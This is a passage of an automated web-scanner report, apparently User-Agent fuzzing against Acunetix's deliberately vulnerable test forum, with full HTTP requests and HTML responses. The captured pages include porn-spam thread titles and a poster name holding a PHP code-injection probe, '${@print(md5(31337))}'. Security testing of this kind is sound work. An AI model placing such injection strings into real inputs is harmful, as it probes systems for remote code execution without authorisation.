bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 375 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:12 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 359 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:12 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 359 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:12 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 359 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:12 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 381 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:13 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
